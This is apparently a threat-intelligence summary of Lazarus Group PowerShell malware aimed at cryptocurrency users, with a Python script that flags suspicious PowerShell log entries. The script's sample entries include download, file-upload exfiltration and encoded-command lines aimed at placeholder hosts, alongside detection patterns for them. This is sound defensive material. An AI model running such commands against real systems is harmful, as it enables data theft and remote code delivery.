North Korea Confirmed to Still be Targeting Crypto-currency

North Korea (Lazarus Group): The North Korean hacking group known as the Lazarus Group has been targeting cryptocurrency professionals and services. Last November, it was reported that the group was using new types of malware to steal cryptocurrency and to collect information about the devices being used for cryptocurrency work. That operation was the first observed to use Mac malware with the ability to compromise Mac machines. The newest operation uses a PowerShell script to exploit Windows systems. The group is highly sophisticated and builds in multiple forms of backup and redundancy to ensure the highest rate of infection, including reserve malware so that the attack can continue even if the primary malware is detected. In this particular case, the group uses a PowerShell command and C2 servers to communicate with the targeted device. The C2 script names are disguised as open-source project and WordPress names to avoid detection. The malware can download and upload files, and the majority of the files observed have been written in Korean, which suggests that the Lazarus Group is targeting South Korean entities.
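The summary above describes a PowerShell stage that talks to C2 servers and can download and upload files. From a detection standpoint the useful observation is that this activity shows up in PowerShell script block logging (Windows Event ID 4104) regardless of how the C2 hostnames are named. The following is an added example, not code from the original report or from any named vendor: it scans a handful of constructed script-block entries for common download/upload cradle patterns and encoded-command use, and tallies the hosts contacted. The hostnames, paths and the base64 string are invented placeholders, not indicators from the report.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample script-block log entries (Event ID 4104 style).
# Hostnames, paths and the base64 blob are placeholders, not real indicators.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "(New-Object Net.WebClient).DownloadFile('http://wp-plugins.example/wp-content/update.php','C:\\Users\\alice\\AppData\\Local\\Temp\\u.dat')",
    "Invoke-WebRequest -Uri 'https://opensource-mirror.example/project/release.php' -OutFile $env:TEMP\\r.bin",
    "$wc = New-Object System.Net.WebClient; $wc.UploadFile('http://wp-plugins.example/wp-admin/upload.php', 'C:\\Users\\alice\\Documents\\report.docx')",
    "powershell.exe -NoProfile -EncodedCommand QQBCAEMA",  # constructed; decodes to 'ABC'
    "Write-Host 'hello world'",
]

# Behavioural patterns: a download cradle, an upload call, a web request
# cmdlet, or an encoded command line. Name-based matching on the C2 host is
# deliberately avoided because the report notes the names mimic legitimate
# open-source projects and WordPress.
CRADLE_PATTERNS = [
    (r"\.DownloadFile\(|\.DownloadString\(", "webclient_download"),
    (r"\.UploadFile\(", "webclient_upload"),
    (r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod", "invoke_webrequest"),
    (r"-EncodedCommand|-enc\b", "encoded_command"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def classify_script_block(block):
    """Return the matched behaviour tags and any URLs/hosts seen in one entry."""
    tags = [tag for pattern, tag in CRADLE_PATTERNS
            if re.search(pattern, block, re.IGNORECASE)]
    urls = URL_RE.findall(block)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {"tags": tags, "urls": urls, "hosts": hosts}


def find_suspicious(blocks):
    """Keep only the entries that matched at least one behaviour pattern."""
    findings = []
    for block in blocks:
        result = classify_script_block(block)
        if result["tags"]:
            result["block"] = block
            findings.append(result)
    return findings


def contacted_hosts(blocks):
    """Count how often each remote host appears in flagged entries.

    A host that is contacted by several flagged blocks (download, then upload)
    is a natural pivot for the analyst, whatever its name looks like.
    """
    counts = Counter()
    for finding in find_suspicious(blocks):
        for url in finding["urls"]:
            host = urlparse(url).hostname
            if host:
                counts[host] += 1
    return dict(counts)


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_SCRIPT_BLOCKS):
        print(finding["tags"], finding["hosts"], finding["block"][:70])
    print(contacted_hosts(SAMPLE_SCRIPT_BLOCKS))
```

The point of counting hosts rather than matching on names is that an allowlist keyed on "looks like a WordPress or open-source domain" is exactly what the disguised C2 names are meant to slip past; pairing a download cradle with a later upload to the same host is a stronger signal than the hostname itself.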

Analyst Notes

North Korea has a long-standing reputation for targeting South Korea, and even though negotiations between North Korea, South Korea and the United States seem to be going well, that does not mean North Korea has stopped its cyber operations. With the many sanctions placed on it, North Korea will always need a way to supplement its income, and targeting the financial industry will always be one way to accomplish that.